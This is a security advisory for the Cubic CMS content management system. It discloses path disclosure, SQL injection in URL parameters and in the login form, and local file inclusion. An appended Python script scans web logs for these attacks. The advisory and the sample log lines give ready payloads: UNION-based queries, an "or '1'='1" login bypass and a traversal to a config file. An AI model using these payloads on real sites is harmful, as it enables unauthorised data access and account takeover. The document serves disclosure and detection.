I. BACKGROUND
-------------------------
"CUBIC CMS" is a non-free content management system for websites and portals of any size. It is powerful, adaptable to any graphic design, and gives users website administration that is 100% professional yet simple.

II. VULNERABILITIES
-------------------------

II.i FULL PATH DISCLOSURE
-------------------------
CUBIC CMS discloses the full path when a 'Controller Not Found' exception is raised, due to incorrect handling of the 'Software Exception'.

Syntax:

http://www.example.com/id/-22
http://www.example.com/foo.bar

II.ii SQL Injection
-------------------------
CUBIC CMS is vulnerable to SQL injection through the 'resource_id' and 'version_id' parameters of its '/recursos/agent.php' (Resources Management Module) script via the HTTP GET method, due to insufficient sanitization of user-supplied data.

Syntax:

http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -

II.iii SQL Injection
-------------------------
CUBIC CMS is vulnerable to SQL injection through the 'login' and 'pass' parameters of its '/login.usuario' (Users Management Module) script via the HTTP POST method, due to insufficient sanitization of user-supplied data.

Syntax:

login=Administrator&pass=foobar') or ('1'='1

II.iv Local File Inclusion
-------------------------
CUBIC CMS is vulnerable to Local File Inclusion through the 'path' parameter of its '/recursos/agent.php' (Resources Management Module) script via the HTTP GET method, due to insufficient sanitization of user-supplied data.

Syntax:

http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini

IV. REFERENCES
-------------------------
http://www.proyectosbds.com
https://www.cubicfactory.com/

V. DISCLOSURE TIMELINE
-------------------------
- March 28, 2012: First Vendor Contact.
- Dec 30, 2013: Second Vendor Contact (Still waiting for responses).

VI. CREDITS
-------------------------
This vulnerability has been discovered by Eugenio Delfa <ed (at) isbox (dot) org>.
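
Added example (not part of the original advisory or of the vendor's code): a Python triage script that reviews web access logs for requests to '/recursos/agent.php' matching II.ii and II.iv, flagging non-numeric 'resource_id'/'version_id' values and 'path' values that climb out of the resource directory. The virtual root, the assumption that ids are non-negative integers, and the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

AGENT = "/recursos/agent.php"  # script named in II.ii and II.iv
ID_PARAMS = ("resource_id", "version_id")  # assumed: non-negative integers
ROOT = "/resources"  # assumed virtual root that 'path' values must stay under
REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')

def escapes_root(value):
    """True if a 'path' value normalises to somewhere outside ROOT."""
    resolved = posixpath.normpath(posixpath.join(ROOT, value.lstrip("/")))
    return "\x00" in value or not (resolved + "/").startswith(ROOT + "/")

def classify(target):
    """Return findings for one request target; an empty list means clean."""
    parts = urlsplit(target)
    if parts.path != AGENT:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    findings = []
    for name in ID_PARAMS:
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get(name, [])):
            findings.append(f"{name}: non-numeric")
    if any(escapes_root(v) for v in params.get("path", [])):
        findings.append("path: traversal")
    return findings

def scan(lines):
    """Return [(line_number, findings)] for log lines that need review."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2014:10:00:00 +0000] "GET /recursos/agent.php?resource_id=42 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2014:10:00:05 +0000] "GET /recursos/agent.php?resource_id=-11%20OR%20%27foobar%27%20UNION%20SELECT%20user()--%20- HTTP/1.1" 200 498',
    '192.0.2.11 - - [01/Jan/2014:10:00:09 +0000] "GET /recursos/agent.php?path=/../../application/config/project.ini HTTP/1.1" 200 1301',
    '192.0.2.12 - - [01/Jan/2014:10:00:12 +0000] "GET /recursos/agent.php?path=css/site.css&version_id=7 HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The POST body of '/login.usuario' (II.iii) does not appear in a standard access log, so covering it needs request-body logging or a check at the application or WAF layer.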